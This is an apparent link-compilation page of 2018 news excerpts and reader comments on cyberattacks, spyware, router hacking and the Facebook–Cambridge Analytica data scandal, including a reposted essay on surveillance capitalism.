But instead of charging Mr. Schulte in the breach, referred to as the Vault 7 leak, prosecutors charged him last August with possessing child pornography, saying agents had found 10,000 illicit images on a server he created as a business in 2009 while studying at the University of Texas at Austin.

Court papers quote messages from Mr. Schulte that suggest he was aware of the encrypted images of children being molested by adults on his computer, though he advised one user, "Just don't put anything too illegal on there."

In September, Mr. Schulte was released on the condition that he not leave New York City, where he lived with a cousin, and keep off computers. He was jailed in December after prosecutors found evidence that he had violated those rules, and he has been held at the Metropolitan Correctional Center in Manhattan since then. He has posted on Facebook under a pseudonym a series of essays critical of the criminal justice system.

It is unclear why, more than a year after he was arrested, he has not been charged or cleared in connection with Vault 7. Leak investigators have had access to electronic audit trails inside the C.I.A. that may indicate who accessed the files that were stolen, and they have had possession of Mr. Schulte's personal data for many months.

... ... ...

According to his family and his LinkedIn page , Mr. Schulte did an internship at the National Security Agency while working on a bachelor's degree in computer engineering. He worked in the C.I.A.'s Engineering Development Group, which designed the hacking tools used by its Center for Cyber Intelligence. He left the agency in November 2016 and moved to New York to work for Bloomberg L.P. as a software engineer.

Most of the government's cyberespionage is carried out by the N.S.A., but the C.I.A. also employs hackers. The leaked Vault 7 documents came from the agency's Engineering Development Group and included descriptions and instructions for the use of agency hacking tools, but only a small amount of the actual computer code for the tools.

.... ... ...

[Apr 17, 2018] U.S., British governments warn businesses worldwide of Russian campaign to hack routers by Ellen Nakashima

Looks like US and British government does not like competition ;-)
"These network devices make "ideal targets," said Manfra, Homeland Security's assistant secretary for cybersecurity and communications." -- he knows what he is talking about...
The problem here are "very cheap" and "very old" routers and weak firewalls. Your Router's Security Stinks Here's How to Fix It For those who are into this business it might benefical to use a separate firewall unit and a "honeypot" before the router those days. You may wish to buy a low-end commercial-grade Wi-Fi/Ethernet router, which retails for about $200, rather than a consumer-friendly router that can cost as little as $20.
Apr 16, 2018 | www.washingtonpost.com

The unusual public warning from the White House, U.S. agencies and Britain's National Cyber Security Center follows a years-long effort to monitor the threat. The targets number in the millions, officials say, and include "primarily government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors."

... ... ...

These network devices make "ideal targets," said Manfra, Homeland Security's assistant secretary for cybersecurity and communications. Most traffic within a company or between organizations traverses them. So a hacker can monitor, modify or disrupt it, she said. And they're usually not secured at the same level as a network server.

"Once you own the router, you own the traffic that's traversing the router," she said.

... ... ...

Ellen Nakashima is a national security reporter for The Washington Post. She covers cybersecurity, surveillance, counterterrorism and intelligence issues. She has also served as a Southeast Asia correspondent and covered the White House and Virginia state politics. She joined The Post in 1995. Follow @nakashimae

jedediah smytheson, 3 hours ago

It is appropriate to reveal and decry misbehavior in cyberspace. What is not appropriate is our leaders ignoring their own responsibility to secure government networks. The sad fact is that senior leaders in government do not understand the issue and are unwilling to accept any inconvenience. The Federal government has lost huge amounts of very sensitive data of AT LEAST 100 million citizens. If I remember correctly, OPM lost 23 million electronic security clearance forms (SF 86s) with personal information not only of the person being processed for a clearance, but also of the members of that person's family. That's how I came up with over 100 million. And what was the result? Well, no one was held accountable or responsible for this incredible breach of security. More importantly, the networks are still not well secured. In summary, we will be hacked continuously until someone in Government takes this seriously and puts more resources into securing the networks rather than turning the public's attention away from their own incompetence and focusing on our adversaries.

bluefrog, 4 hours ago

Haha ... the U.K. who secretly tapped the fiber optic cables running under the Atlantic Ocean to record EVERYONE's private data is now advising against hackers! A degenerate country operating on the basis of lies and deceit, I don't trust them as far as I can throw them.

hkbctkny, 4 hours ago

This is really nothing new [ https://www.us-cert.gov/ncas/alerts/TA18-106A ] - most of this has been going on forever, even skript kiddies were on it back in the day.

The only part that might be news is if there's evidence of a concerted, targeted campaign from one very organized actor. Haven't seen the evidence presented, though, and my scans are basically what they've always been: hundreds and hundreds from residential CPE and other compromised machines from all over the world.

Update your firmware - even old devices can be updated, for the most part; turn off remote mgt (!), change the password to something that YOU set.

Make it challenging, at least.
4 hours ago
Really no different from the NSA and GCHQ..........

[Mar 27, 2018] Meet the Tiny Startup That Sells IPhone and Android Zero Days To Governments

Mar 27, 2018 | it.slashdot.org

(vice.com) The story of Azimuth Security, a tiny startup in Australia, provides a rare peek inside the secretive industry that helps government hackers get around encryption . Azimuth is part of an opaque, little known corner of the intelligence world made of hackers who develop and sell expensive exploits to break into popular technologies like iOS, Chrome, Android and Tor.

[Mar 27, 2018] Skype Can't Fix a Nasty Security Bug Without a Massive Code Rewrite

Mar 27, 2018 | it.slashdot.org

(zdnet.com) BeauHD on Monday February 12, 2018 @10:00PM from the back-to-the-drawing-board dept. ZDNet reports of a security flaw in Skype's updater process that " can allow an attacker to gain system-level privileges to a vulnerable computer ." If the bug is exploited, it "can escalate a local unprivileged user to the full 'system' level rights -- granting them access to every corner of the operating system." What's worse is that Microsoft, which owns Skype, won't fix the flaw because it would require the updater to go through "a large code revision." Instead, Microsoft is putting all its resources on building an altogether new client. From the report: Security researcher Stefan Kanthak found that the Skype update installer could be exploited with a DLL hijacking technique , which allows an attacker to trick an application into drawing malicious code instead of the correct library. An attacker can download a malicious DLL into a user-accessible temporary folder and rename it to an existing DLL that can be modified by an unprivileged user, like UXTheme.dll. The bug works because the malicious DLL is found first when the app searches for the DLL it needs. Once installed, Skype uses its own built-in updater to keep the software up to date. When that updater runs, it uses another executable file to run the update, which is vulnerable to the hijacking. The attack reads on the clunky side, but Kanthak told ZDNet in an email that the attack could be easily weaponized. He explained, providing two command line examples, how a script or malware could remotely transfer a malicious DLL into that temporary folder.

[Mar 27, 2018] Facebook Gave Data About 57 Billion Friendships To Academic

Mar 27, 2018 | tech.slashdot.org

(theguardian.com) an anonymised, aggregate dataset of 57bn Facebook friendships . From a report: Facebook provided the dataset of "every friendship formed in 2011 in every country in the world at the national aggregate level" to Kogan's University of Cambridge laboratory for a study on international friendships published in Personality and Individual Differences in 2015. Two Facebook employees were named as co-authors of the study, alongside researchers from Cambridge, Harvard and the University of California, Berkeley. Kogan was publishing under the name Aleksandr Spectre at the time. A University of Cambridge press release on the study's publication noted that the paper was "the first output of ongoing research collaborations between Spectre's lab in Cambridge and Facebook." Facebook did not respond to queries about whether any other collaborations occurred. "The sheer volume of the 57bn friend pairs implies a pre-existing relationship," said Jonathan Albright, research director at the Tow Center for Digital Journalism at Columbia University. "It's not common for Facebook to share that kind of data. It suggests a trusted partnership between Aleksandr Kogan/Spectre and Facebook."

[Mar 27, 2018] A Hacker Has Wiped a Spyware Company's Servers -- Again

Mar 27, 2018 | it.slashdot.org

(vice.com) spyware to everyday consumers and wiped their servers, deleting photos captured from monitored devices. A year later, the hacker has done it again . Motherboard: Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent. Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners' and children's phones in order to spy on them. This software has been called "stalkerware" by some.

[Mar 27, 2018] Salon Magazine Mines Monero On Your Computer If You Use an Ad Blocker

Mar 27, 2018 | hardware.slashdot.org

(bbc.com) BeauHD on Monday February 19, 2018 @06:00AM from the crypto-cash dept. dryriver shares a report from BBC: News organizations have tried many novel ways to make readers pay -- but this idea is possibly the most audacious yet. If a reader chooses to block its advertising, U.S. publication Salon will use that person's computer to mine for Monero , a cryptocurrency similar to Bitcoin. Creating new tokens of a cryptocurrency typically requires complex calculations that use up a lot of computing power. Salon told readers: "We intend to use a small percentage of your spare processing power to contribute to the advancement of technological discovery, evolution and innovation." The site is making use of CoinHive, a controversial mining tool that was recently used in an attack involving government websites in the UK, U.S. and elsewhere. However, unlike that incident, where hackers took control of visitors' computers to mine cryptocurrency, Salon notifies users and requires them to agree before the tool begins mining.

[Mar 27, 2018] Flight Sim Company Embeds Malware To Steal Pirates' Passwords

Mar 27, 2018 | yro.slashdot.org

(torrentfreak.com) Flight sim company FlightSimLabs has found itself in trouble after installing malware onto users' machines as an anti-piracy measure . Code embedded in its A320-X module contained a mechanism for detecting 'pirate' serial numbers distributed on The Pirate Bay, which then triggered a process through which the company stole usernames and passwords from users' web browsers.

[Mar 27, 2018] MoviePass CEO Proudly Says App Tracks Your Location Before, After Movies

Mar 27, 2018 | yro.slashdot.org

(techcrunch.com) BeauHD on Tuesday March 06, 2018 @03:00AM from the head-held-high dept. MoviePass CEO Mitch Lowe told an audience at a Hollywood event last Friday that the app tracks moviegoers' locations before and after each show they watch . "We get an enormous amount of information," Lowe said. "We watch how you drive from home to the movies. We watch where you go afterwards." His talk at the Entertainment Finance Forum was entitled "Data is the New Oil: How will MoviePass Monetize It?" TechCrunch reports: It's no secret that MoviePass is planning on making hay out of the data collected through its service. But what I imagined, and what I think most people imagined, was that it would be interesting next-generation data about ticket sales, movie browsing, A/B testing on promotions in the app and so on. I didn't imagine that the app would be tracking your location before you even left your home, and then follow you while you drive back or head out for a drink afterwards. Did you? It sure isn't in the company's privacy policy , which in relation to location tracking discloses only a "single request" when selecting a theater, which will "only be used as a means to develop, improve, and personalize the service." Which part of development requires them to track you before and after you see the movie? A MoviePass representative said in a statement to TechCrunch: "We are exploring utilizing location-based marketing as a way to help enhance the overall experience by creating more opportunities for our subscribers to enjoy all the various elements of a good movie night. We will not be selling the data that we gather. Rather, we will use it to better inform how to market potential customer benefits including discounts on transportation, coupons for nearby restaurants, and other similar opportunities."

[Mar 27, 2018] Half of Ransomware Victims Didn't Recover Their Data After Paying the Ransom

Mar 27, 2018 | it.slashdot.org

(bleepingcomputer.com) A massive survey of nearly 1,200 IT security practitioners and decision makers across 17 countries reveals that half the people who fell victim to ransomware infections last year were able to recover their files after paying the ransom demand. The survey, carried out by research and marketing firm CyberEdge Group, reveals that paying the ransom demand, even if for desperate reasons, does not guarantee that victims will regain access to their files . Timely backups are still the most efficient defense against possible ransomware infections, as it allows easy recovery. The survey reveals that 55% of all responders suffered a ransomware infection in 2017, compared to the previous year's study, when 61% experienced similar incidents. Of all the victims who suffered ransomware infections, CyberEdge discovered that 61.3% opted not to pay the ransom at all. Some lost files for good (8%), while the rest (53.3%) managed to recover files, either from backups or by using ransomware decrypter applications. Of the 38.7% who opted to pay the ransom, a little less than half (19.1%) recovered their files using the tools provided by the ransomware authors.

[Mar 27, 2018] My Cow Game Extracted Your Facebook Data

Mar 27, 2018 | tech.slashdot.org

(theatlantic.com) Already in 2010, it felt like a malicious attention market where people treated friends as latent resources to be optimized. Compulsion rather than choice devoured people's time. Apps like FarmVille sold relief for the artificial inconveniences they themselves had imposed. In response, I made a satirical social game called Cow Clicker. Players clicked a cute cow, which mooed and scored a "click." Six hours later, they could do so again. They could also invite friends' cows to their pasture, buy virtual cows with real money, compete for status, click to send a real cow to the developing world from Oxfam, outsource clicks to their toddlers with a mobile app, and much more. It became strangely popular, until eventually, I shut the whole thing down in a bovine rapture -- the "cowpocalypse." It's kind of a complicated story .

But one worth revisiting today, in the context of the scandal over Facebook's sanctioning of user-data exfiltration via its application platform. It's not just that abusing the Facebook platform for deliberately nefarious ends was easy to do (it was). But worse, in those days, it was hard to avoid extracting private data, for years even, without even trying. I did it with a silly cow game. Cow Clicker is not an impressive work of software. After all, it was a game whose sole activity was clicking on cows. I wrote the principal code in three days, much of it hunched on a friend's couch in Greenpoint, Brooklyn. I had no idea anyone would play it, although over 180,000 people did, eventually. And yet, if you played Cow Clicker, even just once, I got enough of your personal data that, for years, I could have assembled a reasonably sophisticated profile of your interests and behavior. I might still be able to; all the data is still there, stored on my private server, where Cow Clicker is still running, allowing players to keep clicking where a cow once stood, before my caprice raptured them into the digital void.

[Mar 27, 2018] 'Slingshot' Malware That Hid For Six Years Spread Through Routers

Mar 27, 2018 | it.slashdot.org

BeauHD on Monday March 12, 2018 @08:10PM from the under-the-radar dept. An anonymous reader quotes a report from Engadget: Security researchers at Kaspersky Lab have discovered what's likely to be another state-sponsored malware strain, and this one is more advanced than most. Nicknamed Slingshot, the code spies on PCs through a multi-layer attack that targets MikroTik routers . It first replaces a library file with a malicious version that downloads other malicious components, and then launches a clever two-pronged attack on the computers themselves. One, Canhadr, runs low-level kernel code that effectively gives the intruder free rein, including deep access to storage and memory; the other, GollumApp, focuses on the user level and includes code to coordinate efforts, manage the file system and keep the malware alive. Kaspersky describes these two elements as "masterpieces," and for good reason. For one, it's no mean feat to run hostile kernel code without crashes. Slingshot also stores its malware files in an encrypted virtual file system, encrypts every text string in its modules, calls services directly (to avoid tripping security software checks) and even shuts components down when forensic tools are active. If there's a common method of detecting malware or identifying its behavior, Slingshot likely has a defense against it. It's no wonder that the code has been active since at least 2012 -- no one knew it was there. Recent MikroTik router firmware updates should fix the issue. However, there's concern that other router makers might be affected.

[Mar 25, 2018] Surveillance is the DNA of the Platform Economy

Creating a malware application which masks itself as some kind of pseudo scientific test and serves as the backdoor to your personal data is a very dirty trick...
Especially dirty it it used by academic researchers, who in reality are academic scum... An additional type of academic gangsters, in addition to Harvard Mafia
Notable quotes:
"... By Ivan Manokha, a departmental lecturer in the Oxford Department of International Development. He is currently working on power and obedience in the late-modern political economy, particularly in the context of the development of new technologies of surveillance. Originally published at openDemocracy ..."
"... The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration. ..."
"... But as Christopher Wylie, a twenty-eight-year-old Canadian coder and data scientist and a former employee of Cambridge Analytica, stated in a video interview , the app could also collect all kinds of personal data from users, such as the content that they consulted, the information that they liked, and even the messages that they posted. ..."
"... All this is done in order to use data to create value in some way another (to monetize it by selling to advertisers or other firms, to increase sales, or to increase productivity). Data has become 'the new oil' of global economy, a new commodity to be bought and sold at a massive scale, and with this development, as a former Harvard Business School professor Shoshana Zuboff has argued , global capitalism has become 'surveillance capitalism'. ..."
"... What this means is that platform economy is a model of value creation which is completely dependant on continuous privacy invasions and, what is alarming is that we are gradually becoming used to this. ..."
"... In other instances, as in the case of Kogan's app, the extent of the data collected exceeds what was stated in the agreement. ..."
"... What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online. ..."
"... I saw this video back in 2007. It was originally put together by a Sarah Lawrence student who was working on her paper on social media. The ties of all the original investors to IN-Q-Tel scared me off and I decided to stay away from Facebook. ..."
"... But it isn't just FB. Amazon, Twitter, Google, LinkedIn, Apple, Microsoft and many others do the same, and we are all caught up in it whether we agree to participate or not. ..."
"... Platform Capitalism is a mild description, it is manipulation based on Surveillance Capitalism, pure and simple. The Macro pattern of Corporate Power subsuming the State across every area is fascinating to watch, but a little scary. ..."
"... For his part, Aleksandr Kogan established a company, Global Science Research, that contracted with SCL, using Facebook data to map personality traits for its work in elections (Kosinski claims that Kogan essentially reverse-engineered the app that he and Stillwell had developed). Kogan's app harvested data on Facebook users who agreed to take a personality test for the purposes of academic research (though it was, in fact, to be used by SCL for non-academic ends). But according to Wylie, the app also collected data on their entire -- and nonconsenting -- network of friends. Once Cambridge Analytica and SCL had won contracts with the State Department and were pitching to the Pentagon, Wylie became alarmed that this illegally-obtained data had ended up at the heart of government, along with the contractors who might abuse it. ..."
"... This apparently bizarre intersection of research on topics like love and kindness with defense and intelligence interests is not, in fact, particularly unusual. It is typical of the kind of dual-use research that has shaped the field of social psychology in the US since World War II. ..."
"... Much of the classic, foundational research on personality, conformity, obedience, group polarization, and other such determinants of social dynamics -- while ostensibly civilian -- was funded during the cold war by the military and the CIA. ..."
"... The pioneering figures from this era -- for example, Gordon Allport on personality and Solomon Asch on belief conformity -- are still cited in NATO psy-ops literature to this day ..."
"... This is an issue which has frustrated me greatly. In spite of the fact that the country's leading psychologist (at the very least one of them -- ex-APA president Seligman) has been documented taking consulting fees from Guantanamo and Black Sites goon squads, my social science pals refuse to recognize any corruption at the core of their so-called replicated quantitative research. ..."
Mar 24, 2018 | www.nakedcapitalism.com
Yves here. Not new to anyone who has been paying attention, but a useful recap with some good observations at the end, despite deploying the cringe-making trope of businesses having DNA. That legitimates the notion that corporations are people.

By Ivan Manokha, a departmental lecturer in the Oxford Department of International Development. He is currently working on power and obedience in the late-modern political economy, particularly in the context of the development of new technologies of surveillance. Originally published at openDemocracy

The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration.

On March 17, The Observer of London and The New York Times announced that Cambridge Analytica, the London-based political and corporate consulting group, had harvested private data from the Facebook profiles of more than 50 million users without their consent. The data was collected through a Facebook-based quiz app called thisisyourdigitallife, created by Aleksandr Kogan, a University of Cambridge psychologist who had requested and gained access to information from 270,000 Facebook members after they had agreed to use the app to undergo a personality test, for which they were paid through Kogan's company, Global Science Research.

But as Christopher Wylie, a twenty-eight-year-old Canadian coder and data scientist and a former employee of Cambridge Analytica, stated in a video interview , the app could also collect all kinds of personal data from users, such as the content that they consulted, the information that they liked, and even the messages that they posted.

In addition, the app provided access to information on the profiles of the friends of each of those users who agreed to take the test, which enabled the collection of data from more than 50 million.

All this data was then shared by Kogan with Cambridge Analytica, which was working with Donald Trump's election team and which allegedly used this data to target US voters with personalised political messages during the presidential campaign. As Wylie, told The Observer, "we built models to exploit what we knew about them and target their inner demons."

'Unacceptable Violation'

Following these revelations the Internet has been engulfed in outrage and government officials have been quick to react. On March 19, Antonio Tajani President of the European Parliament Antonio Tajani, stated in a twitter message that misuse of Facebook user data "is an unacceptable violation of our citizens' privacy rights" and promised an EU investigation. On March 22, Wylie communicated in a tweet that he accepted an invitation to testify before the US House Intelligence Committee, the US House Judiciary Committee and UK Parliament Digital Committee. On the same day Israel's Justice Ministry informed Facebook that it was opening an investigation into possible violations of Israelis' personal information by Facebook.

While such widespread condemnation of Facebook and Cambridge Analytica is totally justified, what remains largely absent from the discussion are broader questions about the role of data collection, processing and monetization that have become central in the current phase of capitalism, which may be described as 'platform capitalism', as suggested by the Canadian writer and academic Nick Srnicek in his recent book .

Over the last decade the growth of platforms has been spectacular: today, the top 4 enterprises in Forbes's list of most valuable brands are platforms, as are eleven of the top twenty. Most recent IPOs and acquisitions have involved platforms, as have most of the major successful startups. The list includes Apple, Google, Microsoft, Facebook, Twitter, Amazon, eBay, Instagram, YouTube, Twitch, Snapchat, WhatsApp, Waze, Uber, Lyft, Handy, Airbnb, Pinterest, Square, Social Finance, Kickstarter, etc. Although most platforms are US-based, they are a really global phenomenon and in fact are now playing an even more important role in developing countries which did not have developed commercial infrastructures at the time of the rise of the Internet and seized the opportunity that it presented to structure their industries around it. Thus, in China, for example, many of the most valuable enterprises are platforms such as Tencent (owner of the WeChat and QQ messaging platforms) and Baidu (China's search engine); Alibaba controls 80 percent of China's e-commerce market through its Taobao and Tmall platforms, with its Alipay platform being the largest payments platform in China.

The importance of platforms is also attested by the range of sectors in which they are now dominant and the number of users (often numbered in millions and, in some cases, even billions) regularly connecting to their various cloud-based services. Thus, to name the key industries, platforms are now central in Internet search (Google, Yahoo, Bing); social networking (Facebook, LinkedIn, Instagram, Snapchat); Internet auctions and retail (eBay, Taobao, Amazon, Alibaba); on-line financial and human resource functions (Workday, Upwork, Elance, TaskRabbit), urban transportation (Uber, Lyft, Zipcar, BlaBlaCar), tourism (Kayak, Trivago, Airbnb), mobile payment (Square Order, PayPal, Apple Pay, Google Wallet); and software development (Apple's App Store, Google Play Store, Windows App store). Platform-based solutions are also currently being adopted in more traditional sectors, such as industrial production (GE, Siemens), agriculture (John Deere, Monsanto) and even clean energy (Sungevity, SolarCity, EnerNOC).

User Profiling -- Good-Bye to Privacy

These platforms differ significantly in terms of the services that they offer: some, like eBay or Taobao simply allow exchange of products between buyers and sellers; others, like Uber or TaskRabbit, allow independent service providers to find customers; yet others, like Apple or Google allow developers to create and market apps.

However, what is common to all these platforms is the central role played by data, and not just continuous data collection, but its ever more refined analysis in order to create detailed user profiles and rankings in order to better match customers and suppliers or increase efficiency.

All this is done in order to use data to create value in some way another (to monetize it by selling to advertisers or other firms, to increase sales, or to increase productivity). Data has become 'the new oil' of global economy, a new commodity to be bought and sold at a massive scale, and with this development, as a former Harvard Business School professor Shoshana Zuboff has argued , global capitalism has become 'surveillance capitalism'.

What this means is that platform economy is a model of value creation which is completely dependant on continuous privacy invasions and, what is alarming is that we are gradually becoming used to this.

Most of the time platform providers keep track of our purchases, travels, interest, likes, etc. and use this data for targeted advertising to which we have become accustomed. We are equally not that surprised when we find out that, for example, robotic vacuum cleaners collect data about types of furniture that we have and share it with the likes of Amazon so that they can send us advertisements for pieces of furniture that we do not yet possess.

There is little public outcry when we discover that Google's ads are racially biased as, for instance, a Harvard professor Latanya Sweeney found by accident performing a search. We are equally hardly astonished that companies such as Lenddo buy access to people's social media and browsing history in exchange for a credit score. And, at least in the US, people are becoming accustomed to the use of algorithms, developed by private contractors, by the justice system to take decisions on sentencing, which often result in equally unfair and racially biased decisions .

The outrage provoked by the Cambridge Analytica is targeting only the tip of the iceberg. The problem is infinitely larger as there are countless equally significant instances of privacy invasions and data collection performed by corporations, but they have become normalized and do not lead to much public outcry.

DNA

Today surveillance is the DNA of the platform economy; its model is simply based on the possibility of continuous privacy invasions using whatever means possible. In most cases users agree, by signing the terms and conditions of service providers, so that their data may be collected, analyzed and even shared with third parties (although it is hardly possible to see this as express consent given the size and complexity of these agreements -- for instance, it took 8 hours and 59 minutes for an actor hired by the consumer group Choice to read Amazon Kindle's terms and conditions). In other instances, as in the case of Kogan's app, the extent of the data collected exceeds what was stated in the agreement.

But what is important is to understand that to prevent such scandals in the future it is not enough to force Facebook to better monitor the use of users' data in order to prevent such leaks as in the case of Cambridge Analytica. The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration.

What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online.

What we need is a body of international law that will provide regulations and oversight for the collection and use of data.

What is required is an explicit and concise formulation of terms and conditions which, in a few sentences, will specify how users' data will be used.

It is important to seize the opportunity presented by the Cambridge Analytica scandal to push for these more fundamental changes.



Arizona Slim , , March 24, 2018 at 7:38 am

I am grateful for my spidey sense. Thanks, spidey sense, for ringing the alarm bells whenever I saw one of those personality tests on Facebook. I never took one.

Steve H. , , March 24, 2018 at 8:05 am

First they came for

The most efficient strategy is to be non-viable . They may come for you eventually, but someone else gets to be the canary, and you haven't wasted energy in the meantime. TOR users didn't get that figured out.

Annieb , , March 24, 2018 at 2:02 pm

Never took the personality test either, but now I now that all of my friends who did unknowingly gave up my personal information too. I read an article somewhere about this over a year ago so it's really old news. Sent the link to a few people who didn't care. But now that they all know that Cambridge Analytical used FB data in support of the Trump campaign it's all over the mainstream and people are upset.

ChrisPacific , , March 25, 2018 at 4:07 pm

You can disable that (i.e., prevent friends from sharing your info with third parties) in the privacy options. But the controls are not easy to find and everything is enabled by default.

HotFlash , , March 24, 2018 at 3:13 pm

I haven't FB'd in years and certainly never took any such test, but if any of my friends, real or FB, did, and my info was shared, can I sue? If not, why not?

Octopii , , March 24, 2018 at 8:06 am

Everyone thought I was paranoid as I discouraged them from moving backups to the cloud, using trackers, signing up for grocery store clubs, using real names and addresses for online anything, etc. They thought I was overreacting when I said we need European-style privacy laws in this country. People at work thought my questions about privacy for our new location-based IoT plans were not team-based thinking.

And it turns out after all this that they still think I'm extreme. I guess it will have to get worse.

Samuel Conner , , March 24, 2018 at 8:16 am

In a first for me, there are surface-mount resistors in the advert at the top of today's NC links page. That is way out of the ordinary; what I usually see are books or bicycle parts; things I have recently purchased or searched.

But a couple of days ago I had a SKYPE conversation with a sibling about a PC I was scavenging for parts, and surface mount resistors (unscavengable) came up. I suspect I have been observed without my consent and am not too happy about it. As marketing, it's a bust; in the conversation I explicitly expressed no interest in such components as I can't install them. I suppose I should be glad for this indication of something I wasn't aware was happening.

Collins , , March 24, 2018 at 9:14 am

Had you used your computer keyboard previously to search for 'surface mount resistors', or was the trail linking you & resistors entirely verbal?

Samuel Conner , , March 24, 2018 at 10:15 am

No keyboard search. I never so much as think about surface mount components; the inquiry was raised by my sibling and I responded. Maybe its coincidental, but it seems quite odd.

I decided to click through to the site to generate a few pennies for NC and at least feel like I was punishing someone for snooping on me.

Abi , , March 25, 2018 at 3:24 pm

Its been happening to me a lot recently on my Instagram, I don't like pictures or anything, but whenever I have a conversation with someone on my phone, I start seeing ads of what I spoke about

ChiGal in Carolina , , March 25, 2018 at 10:12 am

I thought it came out a while ago that Skype captures and retains all the dialogue and video of convos using it.

Eureka Springs , , March 24, 2018 at 8:44 am

What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online.

Are we, readers of this post, or citizens of the USA supposed to think there is anything binding in declarations? Or anything from the UN if at all inconvenient for that matter?

https://www.un.org/en/universal-declaration-human-rights/
Article 12.

No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honour and reputation. Everyone has the right to the protection of the law against such interference or attacks.

Platforms like facebook allow individuals to 'spy' on each other and people love it. When I was a kid i always marveled at how some households would leave a police scanner on 24/7. With the net we have this writ large with baby, puppy and tv dinner photos. Not to forget it's a narcissist paradise. I have friends who I've tried to gently over time inject tidbits of info like this article provides for many years and they still just refuse to try and get it. If they looked over their shoulder and saw how many people/entities are literally following them everywhere they go, they would become rabid gun owners (don't tread on me!) overnight, but the invisible hand/eye registers not at all.

Pelham , , March 24, 2018 at 9:13 am

A side note: If Facebook and other social media were to assume ANY degree of responsibility for content appearing on their platforms, they would be acknowledging their legal liability for ALL content.

Hence they would be legally responsible just as newspapers are. And major newspapers have on-staff lawyers and editors exquisitely attuned to the possibility of libelous content so they can avoid ruinous lawsuits.

If the law were applied as it should be, Facebook and its brethren wouldn't last five minutes before being sued into oblivion.

albert , , March 24, 2018 at 6:27 pm

" being sued into oblivion ." If only.

Non-liability is a product of the computer age. I remember having to agree with Microsofts policy to absolve them of -any- liability when using their software. If they had their druthers, -no- company would be liable for -anything-. It's called a 'perfect world'.

Companies that host 'social media' should not have to bear any responsibility for their users content. Newspapers employ writers and fact checkers. They are set up to monitor their staff for accuracy (Okay, in theory). So you can sue them and even their journalist employees. Being liable (and not sued) allows them to brag about how truthful they are. Reputations are a valuable commodity these days.

In the case of 'social media' providers, liability falls on the authors of their own comments, which is only fair, in my view. However, I would argue that those 'providers' should -not- be considered 'media' like newspapers, and their members should not be considered 'journalists'.

Also, those providers are private companies, and are free to edit, censor, or delete anything on their site. And of course it's automated. Some conservative Facebook members were complaining about being banned. Apparently, there a certain things you can't say on Facebook.

AFAIC, the bottom line is this: Many folks tend to believe everything they read online. They need to learn the skill of critical thinking. And realize that the Internet can be a vast wasteland; a digital garbage dump.

Why are our leaders so concerned with election meddling? Isn't our propaganda better than the Russians? We certainly pay a lot for it.
. .. . .. -- .

PlutoniumKun , , March 24, 2018 at 9:52 am

It seems even Elon Musk is now rebelling against Facebook.

Musk Takes Down the Tesla and SpaceX Facebook Pages.

Today, Musk also made fun of Sonos for not being as committed as he was to the anti-Facebook cause after the connected-speaker maker said it would pull ads from the platform -- but only for a week.

"Wow, a whole week. Risky " Musk tweeted.

saurabh , , March 24, 2018 at 11:43 am

Musk, like Trump, knows he does not need to advertise because a fawning press will dutifully report on everything he does and says, no matter how dumb.

Jim Thomson , , March 25, 2018 at 9:39 am

This is rich.

I can't resist: It takes a con to know a con.
(not the most insightful comment)

Daniel Mongan , , March 24, 2018 at 10:14 am

A thoughtful post, thanks for that. May I recommend you take a look at "All You Can Pay" (NationBooks 2015) for a more thorough treatment of the subject, together with a proposal on how to re-balance the equation. Full disclosure, I am a co-author.

JimTan , , March 24, 2018 at 11:12 am

People are starting to download copies of their Facebook data to get an understanding of how much information is being collected from them.

JCC , , March 24, 2018 at 11:29 am

A reminder: https://www.youtube.com/watch?v=iRT9On7qie8

I saw this video back in 2007. It was originally put together by a Sarah Lawrence student who was working on her paper on social media. The ties of all the original investors to IN-Q-Tel scared me off and I decided to stay away from Facebook.

But it isn't just FB. Amazon, Twitter, Google, LinkedIn, Apple, Microsoft and many others do the same, and we are all caught up in it whether we agree to participate or not.

Anyone watch the NCAA Finals and see all the ads from Google about being "The Official Cloud of the NCAA"? They were flat out bragging, more or less, about surveillance of players. for the NCAA.

Platform Capitalism is a mild description, it is manipulation based on Surveillance Capitalism, pure and simple. The Macro pattern of Corporate Power subsuming the State across every area is fascinating to watch, but a little scary.

oh , , March 24, 2018 at 1:44 pm

Caveat Emptor: If you watch YouTube, they'll only add to the information that they already have on you!

HotFlash , , March 24, 2018 at 3:27 pm

Just substitute "hook" for 'you" in the URL, you get the same video, no ads, and they claim not to track you. YMMV

Craig H. , , March 24, 2018 at 12:21 pm

Privacy no longer a social norm, says Facebook founder; Guardian; 10 January 2010

The Right to Privacy; Warren & Brandeis; Harvard Law Review; 15 December 1890

It was amusing that the top Google hit for the Brandeis article was JSTOR which requires us to surrender personal detail to access their site. To hell with that.

The part I like about the Brandeis privacy story is the motivation was some Manhattan rich dicks thought the gossip writers snooping around their wedding party should mind their own business. (Apparently whether this is actually true or just some story made up by somebody being catty at Brandeis has been the topic of gigabytes of internet flame wars but I can't ever recall seeing any of those.)

Ed , , March 24, 2018 at 2:50 pm

https://www.zerohedge.com/news/2018-03-23/digital-military-industrial-complex-exposed

" Two young psychologists are central to the Cambridge Analytica story. One is Michal Kosinski, who devised an app with a Cambridge University colleague, David Stillwell, that measures personality traits by analyzing Facebook "likes." It was then used in collaboration with the World Well-Being Project, a group at the University of Pennsylvania's Positive Psychology Center that specializes in the use of big data to measure health and happiness in order to improve well-being. The other is Aleksandr Kogan, who also works in the field of positive psychology and has written papers on happiness, kindness, and love (according to his résumé, an early paper was called "Down the Rabbit Hole: A Unified Theory of Love"). He ran the Prosociality and Well-being Laboratory, under the auspices of Cambridge University's Well-Being Institute.

